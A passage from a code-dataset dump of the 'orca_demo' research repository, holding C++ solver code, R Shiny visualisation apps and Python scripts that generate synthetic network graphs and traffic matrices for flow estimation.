sig, diameter, t2, tmp);\r\n\t//int flag = Solve(t, t2, tmp);\r\n\tfloat* tmp2 = Mul(Transpose(A), tmp);\r\n\treturn Sub(xp, Mul(Transpose(A), tmp), m);\r\n}\r\n\r\nfloat * Dynamic_Update(BMatrix A, float* b, float* xp, bool exact = true, float th = 0)\r\n{\r\n\t// call this, as long as A has not changed\r\n\tint i;\r\n\tfloat* t2 = Sub(Mul(A, xp), b, n);\r\n\tfloat* tmp = new float[n];\r\n\tSolveBySigint(n, sig, diameter, t2, tmp);\r\n\t//int flag = Solve(t, t2, tmp);\r\n\tfloat* tmp2 = Mul(Transpose(A), tmp);\r\n\treturn Sub(xp, Mul(Transpose(A), tmp), m);\r\n}\r\n\r\n\r\n\r\n/* Direct - Exact Unit Test\r\nint main()\r\n{\r\nstring folder = \"data/sample/\";\r\nBMatrix A(folder + \"a.txt\");\r\nint n = A.n, m = A.m;\r\nfloat* b = ReadVector(folder + \"b.txt\", n);\r\nfloat* xp = ReadVector(folder + \"xp.txt\", m);\r\n\r\n\r\nfloat * x = Direct(A, b, xp);\r\n\r\ncout << endl << \"--------------- Result -------------\" << endl;\r\nfor (int i = 0; i < m; i++)\r\ncout << x[i] << \", \";\r\ncout << endl << \"Done!\" << endl;\r\ngetchar();\r\nreturn 0;\r\n}\r\nOutput to compare with: 2.96589, 1.00147, 0.02, 1.00147, 1.03116, 0.0326316, 1.96589,\r\n*/\r\n\r\n"
},
{
"alpha_fraction": 0.6472148299217224,
"alphanum_fraction": 0.6560565829277039,
"avg_line_length": 25.325580596923828,
"blob_id": "0dc90c3d9abe872c4317f5fcefa9696588bb1212",
"content_id": "0e52280ea117f9319cac3b5809a06bf6a187ccdb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1131,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 43,
"path": "/app/rstudio-export/Interactive/app.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "library(shiny)\n\nserver <- function(input,output, session) {\n \n library(DT) \n library(ggplot2) \n \n \n file_reader <- read.csv(file = \"output.txt\", header = FALSE)\n transpose_step1 <- melt(file_reader)\n transpose_table <- as.data.frame(transpose_step1$value)\n colnames(transpose_table) <- c(\"traffic\")\n transpose_table$flow_id <- cbind(c(1:length(transpose_table$traffic)))\n \n \n mod <- transpose_table\n \n output$plot <- renderPlot({\n ggplot(mod, aes(flow_id, traffic)) + geom_point(shape=23, color=\"grey50\") +geom_rug()\n })\n \n dat <- reactive({\n user_brush <- input$user_brush\n brushedPoints(mod, user_brush, xvar = \"flow_id\", yvar = \"traffic\")\n })\n \n output$table <- DT::renderDataTable({DT::datatable(dat())})\n \n output$mydownload <- downloadHandler(\n filename = \"plotextract.csv\",\n content = function(file) {write.csv(dat(), file)}\n )\n}\n\nui <- fluidPage(\n h3(\"Subsetting the Network\"),\n plotOutput(\"plot\", brush = \"user_brush\"),\n dataTableOutput(\"table\"),\n h3(\"Download Flow Data\"),\n downloadButton(outputId = \"mydownload\", label = \"Download Table\")\n)\n\nshinyApp(ui = ui, server = server)"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 19,
"blob_id": "74e9099e501dc8902d169a96a1eb90e70214fb32",
"content_id": "a763d773d2b1c3e75c7752795bfab910c380c710",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20,
"license_type": "no_license",
"max_line_length": 19,
"num_lines": 1,
"path": "/app/rstudio-export/test.py",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "import igraph as ig\n"
},
{
"alpha_fraction": 0.5770158171653748,
"alphanum_fraction": 0.6032681465148926,
"avg_line_length": 43.70658493041992,
"blob_id": "812ddb14b72ce76b0533b70ccf25eadaa388147d",
"content_id": "8471f66dd908510eb2e7791601c5f0a663596876",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7466,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 167,
"path": "/app/rstudio-export/network_generator.py",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport igraph\nimport time\nimport pickle\nfrom the_traffic_magic import get_pareto_traffic_one\nfrom helper_scratch import igraph_get_top_routing_nodes, \\\n igraph_connect_all_top_nodes_criss_cross, go_write_partial_a_and_b, \\\n go_write_full_a_and_b\nimport os\n\n\ndef write_A_matrix(graph_file_name, A_matrix_file_name, b_vector_file_name, gravity_vector_file_name):\n # G = igraph.Graph.Read(graph_file_name, format=\"edgelist\", directed=False)\n G = igraph.Graph.Erdos_Renyi(n=100, m=70, directed=False)\n pick_level_one_routers = 100\n pick_level_one_routers = 3\n print('Done Reading')\n\n to_delete_ids = [v.index for v in G.vs if v.degree() == 0]\n G.delete_vertices(to_delete_ids)\n\n nodes = G.vs.indices\n now = time.time()\n\n # Connect the unconnected components\n unconnected = list(G.clusters())\n for one, two in zip(unconnected[:-1], unconnected[1:]):\n G.add_edges([(one[0], two[0])])\n\n top_nodes = igraph_get_top_routing_nodes(G, pick_level_one_routers)\n routing_nodes = [node for (node, val) in top_nodes]\n print('Total time for making routing nodes - ', time.time() - now, ' total routing nodes - ', len(routing_nodes))\n\n now = time.time()\n igraph_connect_all_top_nodes_criss_cross(G, routing_nodes)\n print('Criss Cross connecting time - ', time.time() - now)\n\n assert len(list(G.clusters())) == 1\n clusters = {node: {} for node in routing_nodes}\n for each in routing_nodes:\n nodes.remove(each)\n\n non_routing_nodes = nodes\n path_collector = {}\n for each_routing_node in routing_nodes:\n path_collector[each_routing_node] = G.get_shortest_paths(each_routing_node, mode=igraph.OUT,output='vpath')\n print('cluster eye shortest paths done')\n\n # code below shows the cluster assignments\n # each node is assigned to the nearest cluster according to path length\n G.vs['which_cluster'] = \"\"\n now = time.time()\n with open('igraph.pickle', 'wb') as handle:\n pickle.dump(G, handle)\n for non_routing_node in non_routing_nodes:\n path_length = 10000000000\n cluster = None\n for routing_node in path_collector:\n if len(path_collector[routing_node][non_routing_node]) < path_length:\n path_length = len(path_collector[routing_node][non_routing_node])\n cluster = routing_node\n clusters[cluster][non_routing_node] = path_collector[cluster][non_routing_node]\n # if cluster == []:\n # print('Whose cluster are you ?')\n G.vs[non_routing_node]['which_cluster'] = cluster\n # reverse_map[non_routing_node] = cluster\n print('cluster assignment took: ', time.time() - now)\n\n with open('edges.txt', 'w') as f:\n for each in G.es:\n f.write(str(each.source) + ', ' + str(each.target) + '\\n' )\n\n s_d_pair_index = 0\n #Read uses a 0 based index - so if using 1 based index be careful about indices\n start_node = 0 #in case you want to do a dumb parallelization set these values\n end_node = G.vcount() #ditto\n\n # create a fake attribute to store all sd_paths this edge participates in.\n # Igraph does not allow empty sequences - so put a sentinel and remove it later\n G.es[\"sd_pairs\"] = \"\"\n G.es[\"edge_traffic\"] = \"0\"\n\n write_head = 500000\n write_head = 50000\n write_head_adder = 500000\n write_head_adder = 50000\n\n # write_head = 500\n dir_path = os.getcwd()\n dir_path = os.path.join(dir_path, 'data')\n\n output_file_gravity = open(gravity_vector_file_name, \"w\")\n gravity = []\n original_traffic = []\n actual = open(os.path.join(dir_path, \"actual.csv\"), \"w\")\n import random\n random.shuffle(non_routing_nodes)\n for n_1 in non_routing_nodes:\n # print(s_d_pair_index)\n if s_d_pair_index > 1000000000:\n # if s_d_pair_index > 1000:\n break\n for n_2 in non_routing_nodes:\n if s_d_pair_index > 1000000000:\n # if s_d_pair_index > 1000:\n break\n if not n_1 == n_2:\n s_d_pair_index_as_str = str(s_d_pair_index)\n if not G.vs[n_1]['which_cluster'] == G.vs[n_2]['which_cluster']:\n path_1 = clusters[G.vs[n_1]['which_cluster']][n_1][::-1]\n path_2 = clusters[G.vs[n_2]['which_cluster']][n_2]\n path = path_1 + path_2\n else:\n path_1 = clusters[G.vs[n_1]['which_cluster']][n_1][::-1]\n path_2 = clusters[G.vs[n_2]['which_cluster']][n_2][1:]\n path = path_1 + path_2\n if path_1 == [] or path_2 == []:\n print('Where are you lost')\n traffic = get_pareto_traffic_one(1, 20)\n for (edge_src, edge_target) in zip(path[:-1], path[1:]):\n G.es[G.get_eid(edge_src, edge_target)][\"sd_pairs\"] += s_d_pair_index_as_str + \",\"\n G.es[G.get_eid(edge_src, edge_target)][\"edge_traffic\"] = str(\n int(G.es[G.get_eid(edge_src, edge_target)][\"edge_traffic\"]) + traffic)\n gravity.append(s_d_pair_index_as_str + '\\t' + str(0.02*traffic*abs(np.random.normal())))\n original_traffic.append(s_d_pair_index_as_str + '\\t' + str(traffic))\n s_d_pair_index += 1\n output_file_gravity.write('\\n'.join(gravity) + '\\n')\n actual.write('\\n'.join(original_traffic) + '\\n')\n gravity = []\n original_traffic = []\n # if s_d_pair_index > write_head:\n # write_head = go_write_partial_a_and_b(G, write_head, s_d_pair_index, 'partial_results', 50000000)\n # write_head = go_write_partial_a_and_b(G, write_head, s_d_pair_index, 'partial_results', write_head_adder)\n if len(gravity) > 0:\n output_file_gravity.write('\\n'.join(gravity))\n if len(original_traffic) > 0:\n actual.write('\\n'.join(gravity))\n\n output_file_gravity.close()\n actual.close()\n\n print('Gravity Calculation - Done')\n\n # write_head = go_write_partial_a_and_b(G, write_head, s_d_pair_index, 'partial_results', write_head_adder)\n go_write_full_a_and_b(G, s_d_pair_index)\n # output_file = open(A_matrix_file_name, \"w\")\n # output_file.write(str(G.ecount()) + \",\" + str(s_d_pair_index - 1) + \"\\n\")\n # b_file = open(b_vector_file_name, \"w\")\n #\n # for edge in G.es:\n # output_file.write(edge[\"sd_pairs\"][:-1] + \"\\n\")\n # b_file.write(edge[\"edge_traffic\"] + \"\\n\")\n # output_file.close()\n # b_file.close()\n\n# write_A_matrix(\"test_graph.txt\", \"a.csv\", 'b.csv', 'gravity.csv')\n# write_A_matrix(\"p2p-Gnutella04_Nodes_10876_edges_39994.txt\", \"a_gnutella_.csv\", 'b_gnutella.csv','gravity_gnutella.csv')\n# write_A_matrix(\"Wiki-Vote_100_edge.txt\", \"100ke_a_wiki_vote.csv\", '100ke_b_gnutella.csv','100ke_gravity_wiki_vote.csv')\n\ndir_path = os.getcwd()\ndir_path = os.path.join(dir_path, 'data')\nwrite_A_matrix(\"\", os.path.join(dir_path, \"a.csv\"), os.path.join(dir_path,'b.csv'),os.path.join(dir_path, 'g.csv'))\n# write_A_matrix(\"email_25k.txt\", \"25ke_a_email.csv\", '25ke_b_email.csv','25ke_gravity_email.csv')\n# write_A_matrix(\"p2p-Gnutella08.txt\", \"25ke_a_gnutella_.csv\", '25ke_b_gnutella.csv','25ke_gravity_gnutella.csv')\n# write_A_matrix(\"Brightkite_edges.txt\", \"200ke_a_brightkite_.csv\", '200ke_b_brightkite.csv','200ke_brightkite.csv')\n\n# write_A_matrix(\"web_Google_Nodes_875713_Edges_5105039.txt\", \"a_google.csv\", 'b_google.csv','gravity_google.csv')\n"
},
{
"alpha_fraction": 0.5249999761581421,
"alphanum_fraction": 0.6499999761581421,
"avg_line_length": 38,
"blob_id": "3b90eacc0616d0bc0570088d92319e56602d2bc4",
"content_id": "973f881109452f5f783e68f25d64a29951234b60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 200,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 5,
"path": "/SR/RunScript4.sh",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "./SR -f data/200ke/8M/ -o outpute.txt\r\n./SR -f data/200ke/16M/ -o outpute.txt\r\n./SR -f data/200ke/32M/ -o outpute.txt\r\n./SR -f data/200ke/64M/ -o outpute.txt\r\n./SR -f data/200ke/128M/ -o outpute.txt\r\n"
},
{
"alpha_fraction": 0.4961636960506439,
"alphanum_fraction": 0.5127876996994019,
"avg_line_length": 25.100000381469727,
"blob_id": "e4bbe7a8b479e40b436f78c5bfd866917a4e7982",
"content_id": "4df997892a8110d77477a498cee16f9eea914201",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 782,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 30,
"path": "/app/rstudio-export/Interactive_test/ui.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "library(ggplot2)\nlibrary(Cairo) # For nicer ggplot2 output when deployed on Linux\nlibrary(shiny)\n# We'll use a subset of the mtcars data set, with fewer columns\n# so that it prints nicel\n\nshinyUI(fluidPage(\n fluidRow(\n column(width = 4,\n plotOutput(\"plot1\", height = 300,\n # Equivalent to: click = clickOpts(id = \"plot_click\")\n click = \"plot1_click\",\n brush = brushOpts(\n id = \"plot1_brush\"\n )\n )\n )\n ),\n fluidRow(\n # column(width = 6,\n # h4(\"Points near click\"),\n # verbatimTextOutput(\"click_info\")\n # ),\n column(width = 6,\n h4(\"Brushed points\"),\n verbatimTextOutput(\"brush_info\")\n )\n )\n)\n)"
},
{
"alpha_fraction": 0.5875961780548096,
"alphanum_fraction": 0.6170212626457214,
"avg_line_length": 24.674419403076172,
"blob_id": "0c88bf37a738d5d0da1ad60b36e76a94f104dd1d",
"content_id": "199bfef0a6e43a3736e18b876ef6f278dd203143",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2209,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 86,
"path": "/app/rstudio-export/test2.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "# Generate colors based on media type:\n\nlibrary(plotly)\nlibrary(igraph)\nlibrary(threejs)\nlibrary(htmlwidgets)\n# data(karate, package=\"igraphdata\")\n# G <- upgrade_graph(karate)\n\n\n\nf <- read.csv(file = \"edges_with_index_1.csv\", header = FALSE)\nedges <- c()\nprint(dim(f)[1])\nfor (e in 1:dim(f)[1]){\n edges <- append(edges, c(f[e, 1], f[e, 2]))\n}\nlength(edges)\nG <- make_graph(edges)\nE(G)\nprint(length(V(G)))\nprint(length(E(G)))\nnet = G\nnet.js <- net\ngraph_attr(net.js, \"layout\") <- NULL \ngjs <- graphjs(net.js, main=\"Network!\", bg=\"gray10\", showLabels=F, stroke=F, \n curvature=0.1, attraction=0.9, repulsion=0.8, opacity=0.2)\nprint(gjs)\nsaveWidget(gjs, file=\"Media-Network-gjs.html\")\nbrowseURL(\"Media-Network-gjs.html\")\nnet <- simplify(net, remove.multiple = F, remove.loops = T) \nplot(net, edge.arrow.size=.4,vertex.label=NA)\n\nplot(net)\ncolrs <- c(\"gray50\", \"tomato\", \"gold\")\n#V(net)$color <- colrs[V(net)$media.type]\n\n# Compute node degrees (#links) and use that to set node size:\ndeg <- degree(net, mode=\"all\")\n# V(net)$size <- deg*3\n# We could also use the audience size value:\n# V(net)$size <- V(net)$audience.size*0.6\n\n# The labels are currently node IDs.\n# Setting them to NA will render no labels:\n# V(net)$label <- NA\n\n# Set edge width based on weight:\n# E(net)$width <- E(net)$weight/6\n\n#change arrow size and edge color:\nE(net)$arrow.size <- .2\nE(net)$edge.color <- \"gray80\"\n\n# We can even set the network layout:\ngraph_attr(net, \"layout\") <- layout_with_lgl\n#plot_ly(net)\nprint(length(V(net)))\nl = layout_on_sphere(net)\n\np <- plot_ly(as.data.frame(l), x=l[,1], y = l[,2], z = l[,3],type = 'scatter3d')%>% \nadd_paths(x=lines_df_x,y=lines_df_y,z=lines_df_z)\n#,x=lines_df_x,y=lines_df_y,z=lines_df_z\nf <- read.csv(file = \"edges_with_index_1.csv\", header = FALSE)\n\nprint(length(f$V1))\nlines_df_x <- c()\nlines_df_y <- c()\nlines_df_z <- c()\nfor (i in 1:(length(f$V1))){\n p1 <- (f[i, 1])\n p2 <- (f[i, 2])\n x1 <- (l[p1,1])\n y1 <- (l[p1,2])\n z1 <- (l[p1,3])\n x2 <- (l[p2,1])\n y2 <- (l[p2,2])\n z2 <- (l[p2,3])\n\n lines_df_x <- c(lines_df_x, x1, x2, rep(NA,1))\n lines_df_y <- c(lines_df_y,y1, y2, rep(NA,1))\n lines_df_z <- c(lines_df_z,z1, z2, rep(NA,1))\n print(i)\n \n \n}\n\n"
},
{
"alpha_fraction": 0.6601731777191162,
"alphanum_fraction": 0.6948052048683167,
"avg_line_length": 37.58333206176758,
"blob_id": "38291f1a74322a0e16945f3cc7e979a4e577b754",
"content_id": "ad4aebcbe3a3bed550058f9241a2f503c4eeaba5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 462,
"license_type": "no_license",
"max_line_length": 230,
"num_lines": 12,
"path": "/app/rstudio-export/Interactive/colorScheme/app.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "library(shiny)\nrequire(heatmaply)\nui <- basicPage(\n plotlyOutput(\"heatmap\",height = \"800px\",width = \"800px\")\n)\nserver <- function(input, output) {\n mat <- read.csv(\"aat.csv\", header = FALSE)\n # print(mat)\n output$heatmap <- renderPlotly(heatmaply(mat, Rowv = FALSE, Colv = FALSE, margins = c(40,40,40,40), showticklabels = FALSE,scale_fill_gradient_fun = ggplot2::scale_fill_gradient2(low = \"white\", high = \"red\"),hide_colorbar=TRUE))\n}\n\nshinyApp(ui, server)"
},
{
"alpha_fraction": 0.4958506226539612,
"alphanum_fraction": 0.5532503724098206,
"avg_line_length": 22.322580337524414,
"blob_id": "1798a77e8222ceda04d5535fcb2268738ad90c86",
"content_id": "4c26491f1fc1bc84199d800aaa543f3d0eaf5f48",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1446,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 62,
"path": "/app/rstudio-export/small_test.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "f <- read.csv(file = \"edges_1_5.csv\", header = FALSE)\nedges <- c()\ng= graph()\n# read.graph(\"edges_1_5.csv\", format=\"edgelist\")\n# read.graph(\"edges_1_5.txt\", format=\"edgelist\")\nprint(dim(f)[1])\nfor (e in 1:dim(f)[1]){\n edges <- append(edges, c(f[e, 1], f[e, 2]))\n}\n\nprint(edges)\nlength(edges)\nG <- graph_from_edgelist(as.matrix(f), directed = TRUE)\n# G = graph_from_literal(7--8, 5--32, 24--43, 50--66, 34--70)\nV(G)\nE(G)\n\nG = graph.data.frame(f, directed=TRUE, vertices=NULL)\nV(G)\nE(G)\n\nl = layout_on_sphere(G)\nlines_df_x <- c()\nlines_df_y <- c()\nlines_df_z <- c()\nprint(length(f$V1))\nmapper = c()\ni = 1\n\nlist_data <- list(c(V(G)$name))\nmatch(\"8\", list_data)\nlist_data\nlist_data <- as.numeric(list_data)\nlist_data_1 <- list()\nfor (j in 1:length(V(G))){\n # print(c(list_data[[1]][j]))\n list_data_1 <- append(list_data_1, c(list_data[[1]][j]))\n # print(list_data[[1]][j])\n}\n\n\nfor (i in 1:(length(f$V1))){\n p1 <- (f[i, 1])\n p2 <- (f[i, 2])\n p1 <- match(p1, list_data[[1]])\n p2 <- match(p2, list_data[[1]])\n print(p1)\n print(p2)\n x1 <- (l[p1,1])\n y1 <- (l[p1,2])\n z1 <- (l[p1,3])\n x2 <- (l[p2,1])\n y2 <- (l[p2,2])\n z2 <- (l[p2,3])\n \n lines_df_x <- c(lines_df_x, x1, x2, rep(NA,1))\n lines_df_y <- c(lines_df_y,y1, y2, rep(NA,1))\n lines_df_z <- c(lines_df_z,z1, z2, rep(NA,1))\n print(i)}\np <- plot_ly(as.data.frame(l), x=l[,1], y = l[,2], z = l[,3],type = 'scatter3d')%>% \n add_paths(x=lines_df_x,y=lines_df_y,z=lines_df_z)\np\n"
},
{
"alpha_fraction": 0.5254079103469849,
"alphanum_fraction": 0.550582766532898,
"avg_line_length": 32,
"blob_id": "e228d30191a8d398d1e787a4d2e1b637b5d16188",
"content_id": "626d5096bb29463317b2dd648a66ae6a7f8574e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2145,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 65,
"path": "/app/rstudio-export/combine_input.py",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nimport sys\nimport os\n\n\ndef combine_inputs(file1, file2):\n # print(file1, file2)\n f1 = open(file1, 'r')\n f2 = open(file2, 'r')\n edges1, sd_pairs = (f1.readline().split(\",\"))\n edges2, sd_pairs_latest = (f2.readline().split(\",\"))\n sd_pairs = int(sd_pairs.strip())\n sd_pairs_latest = int(sd_pairs_latest.strip())\n assert edges1 == edges2\n # print(sd_pairs, sd_pairs_latest)\n assert sd_pairs_latest > sd_pairs\n # print(f1.readline())\n\n # dirName = 'results/edges_' + str(edges1) + '_sd_pairs_' + str(sd_pairs_latest)\n dirName = 'edges_' + str(edges1) + '_sd_pairs_' + str(sd_pairs_latest)\n\n try:\n os.mkdir(dirName)\n except FileExistsError:\n print(\"Directory \", dirName, \" already exists\")\n\n new_file = open(dirName + '/a.txt', 'w')\n\n original_new_file = open(dirName + '/a_jees.txt', 'w')\n\n new_file.write(str(edges1.strip()) + ',' + str(sd_pairs_latest) + '\\n')\n original_new_file.write(str(edges1.strip()) + ',' + str(sd_pairs_latest) + '\\n')\n new_file.flush()\n\n\n original_new_file.flush()\n for first, second in zip(f1, f2):\n new_line_1 = \"\"\n new_line = \"\"\n first = first.split('\\t')\n second = second.split('\\t')\n assert first[0] == second[0]\n\n new_line_1 = str(first[0]) + \"\\t\"\n first_null = True\n if first[1].strip() != '':\n first_null = False\n new_line = first[1].strip()\n if second[1].strip() != '':\n if not first_null:\n new_line = new_line + ','\n new_line = new_line + second[1].strip()\n new_line = new_line.strip() + \"\\n\"\n new_line_1 = str(first[0]) + \"\\t\" + new_line\n # new_line = first[1].strip() + ',' + second[1].strip() + '\\n'\n # new_line_1 = str(first[0]) + '\\t' + first[1].strip() + ',' + second[1].strip() + '\\n'\n new_file.write(new_line)\n new_file.flush()\n original_new_file.write(new_line_1)\n original_new_file.flush()\n\n\ncombine_inputs(sys.argv[1], sys.argv[2])\n# combine_inputs(\"partial_results_A_upto_502200.csv\", \"partial_results_A_upto_1004400.csv\")\n"
},
{
"alpha_fraction": 0.5922619104385376,
"alphanum_fraction": 0.6101190447807312,
"avg_line_length": 27,
"blob_id": "737242cabaeb57f422fe6f06cf4a0ffacc8012b8",
"content_id": "f33cbc285f2e9a724448bab03bb21de761f292f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 672,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 24,
"path": "/app/rstudio-export/Interactive_test/server.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "\nlibrary(shiny)\nmtcars2 <- mtcars[, c(\"mpg\", \"cyl\", \"disp\", \"hp\", \"wt\", \"am\", \"gear\")]\n\nshinyServer(function(input, output) {\n output$plot1 <- renderPlot({\n ggplot(mtcars2, aes(wt, mpg)) + geom_point()\n })\n \n # output$click_info <- renderPrint({\n # # Because it's a ggplot2, we don't need to supply xvar or yvar; if this\n # # were a base graphics plot, we'd need those.\n # nearPoints(mtcars2, input$plot1_click, addDist = TRUE)\n # print(input$plot1_click)\n # })\n k = 0\n output$brush_info <- renderPrint({\n print('hi')\n # print(input)\n k <- k+1\n # print(k)\n print(input$plot1_brush)\n brushedPoints(mtcars2, input$plot1_brush)\n })\n})"
},
{
"alpha_fraction": 0.38457176089286804,
"alphanum_fraction": 0.4001701772212982,
"avg_line_length": 39.068180084228516,
"blob_id": "2fe9d75ae810f800141455f169db91623966ef23",
"content_id": "b707f18d76d1b075c14748bade797910e4ae2be8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 3526,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 88,
"path": "/app/rstudio-export/ui.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "library(shiny)\nlibrary(plotly)\n# Define UI for application that draws a histogram\nshinyUI(navbarPage(\"ORCA-SR\",\n\n # Application title\n tabPanel(\"3D Visualization\",\n\n # Sidebar with a slider input for number of bins\n sidebarLayout(\n sidebarPanel(\n \n selectInput(inputId = \"type\",\n label = \"Type of Graph\",\n choices = c(\"Rene Erdos\",\"P2P-Gnutella\"),\n selected = \"P2P-Gnutella\"),\n selectInput(inputId = \"traffic\",\n label = \"Type of Traffic\",\n choices = c(\"Pareto\",\"Uniform\"),\n selected = \"Uniform\"),\n selectInput(inputId = \"prior\",\n label = \"Type of Prior\",\n choices = c(\"Gravity\",\"Perturbed\"),\n selected = \"Gravity\"),\n numericInput(inputId = \"node\",\n label = \"Number of Nodes\",\n min = 1,\n max = 10000,\n value = 100),\n selectInput(inputId = \"threshold\",\n label = \"Threshold\",\n choices = c(\"SD_Pair/10\",\"SD_Pair/100\", \"SD_Pair/1000\", \"SD_Pair/100000\"),\n selected = \"Red\"),\n submitButton(text = \"Generate Network\", icon = NULL, width = NULL),\n # Horizontal line ----\n tags$hr(),\n fileInput(\"file1\", \"Choose Edge (.csv)\",\n multiple = FALSE,\n accept = c(\"text/csv\",\n \"text/comma-separated-values,text/plain\",\n \".csv\")),\n fileInput(\"file1\", \"Choose Traffic (.csv)\",\n multiple = FALSE,\n accept = c(\"text/csv\",\n \"text/comma-separated-values,text/plain\",\n \".csv\")),\n fileInput(\"file1\", \"Choose Prior (.csv)\",\n multiple = FALSE,\n accept = c(\"text/csv\",\n \"text/comma-separated-values,text/plain\",\n \".csv\")),\n submitButton(text = \"Generate Network\", icon = NULL, width = NULL)\n ),\n \n \n # Show a plot of the generated distribution\n mainPanel(\n plotlyOutput(\"distPlot\")\n ))\n ),\n tabPanel(\"SD Flows\",\n dataTableOutput(\"test\")\n ),\n tabPanel(\"SD Subsetting\",\n plotOutput(\"plot2\", height = 300,\n dblclick = \"plot_dblclick\",\n brush = brushOpts(\n id = \"plot1_brush\")),\n fluidRow(\n # column(width = 6,\n # h4(\"Points near click\"),\n # verbatimTextOutput(\"click_info\")\n # ),\n column(width = 12,\n h4(\"Selected Flows\"),\n verbatimTextOutput(\"brush_info\")\n )\n )\n ),\n tabPanel(\"Threshold\"\n # mainPanel(\n # column(6,\n # plotlyOutput(\"heatmap\",height = \"700px\",width = \"700px\")),\n # column(6,\n # plotlyOutput(\"heatmap2\",height = \"700px\",width = \"700px\")))\n\n )\n))\n"
},
{
"alpha_fraction": 0.4051724076271057,
"alphanum_fraction": 0.4137931168079376,
"avg_line_length": 33.79999923706055,
"blob_id": "303d6c4e7a6c63e003b978f855268a92d9213c57",
"content_id": "72b1ecb38ea208d2804cd19528a3492de7ae93ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2436,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 70,
"path": "/app/rstudio-export/Interactive_test/Check_fluidPage/testapp.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "shinyApp(\n# Define UI for application that draws a histogram\nshinyUI(fluidPage\n (mainPanel\n (tabsetPanel\n (\n \n tabPanel(\"Interactive\",\n plotOutput(\"plot2\", click = \"plot_click\"),\n verbatimTextOutput(\"test\")\n\n ),\n tabPanel(\"Traffic\",\n dataTableOutput(\"test\"))\n )))),\nshinyServer(function(input, output) {\n \n library(plotly)\n library(igraph)\n library(reshape2)\n library(shiny)\n\n ##################################################################################################################################################################### \n \n ##### Tab 3 ###### \n \n ##################################################################################################################################################################### \n library(Cairo)\n library(ggplot2)\n mtcars2 <- mtcars[, c(\"mpg\", \"cyl\", \"disp\", \"hp\", \"wt\", \"am\", \"gear\")]\n output$plot2 <- renderPlot({\n ggplot(mtcars2, aes(wt, mpg)) + geom_point()\n })\n # output$click_info <- renderPrint({\n # # Because it's a ggplot2, we don't need to supply xvar or yvar; if this\n # # were a base graphics plot, we'd need those.\n # nearPoints(mtcars2, input$plot_click, addDist = TRUE)\n # brushedPoints(mtcars2, input$plot1_brush)\n # })\n output$test <- renderPrint({\n #print('Hi')\n input$plot_click\n #print(input$plot1_click)\n #brushedPoints(mtcars2, input$plot1_brush)\n # brushedPoints(mtcars2)\n })\n output$test <- renderDataTable({\n library(kableExtra)\n library(DT)\n library(Cairo)\n \n file_reader <- read.csv(file = \"output.txt\", header = FALSE)\n transpose_step1 <- melt(file_reader)\n transpose_table <- as.data.frame(transpose_step1$value)\n colnames(transpose_table) <- c(\"Traffic\")\n transpose_table$col2 <- cbind(c(1:length(transpose_table$Traffic)))\n datatable(transpose_table, filter = 'top', options = list(pageLength = 5))\n })\n \n \n ##################################################################################################################################################################### \n \n ##### Tab 2 ###### \n \n ##################################################################################################################################################################### \n \n})\n\n\n)\n"
},
{
"alpha_fraction": 0.3339279294013977,
"alphanum_fraction": 0.3374955356121063,
"avg_line_length": 45.71666717529297,
"blob_id": "50ff0b1b166ba80b01e60d6ad951198a8f00d82e",
"content_id": "ca7fa8cda7daef4df1b95f18742f8f8704861af7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2803,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 60,
"path": "/app/rstudio-export/Interactive_test/Check_fluidPage/ui.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
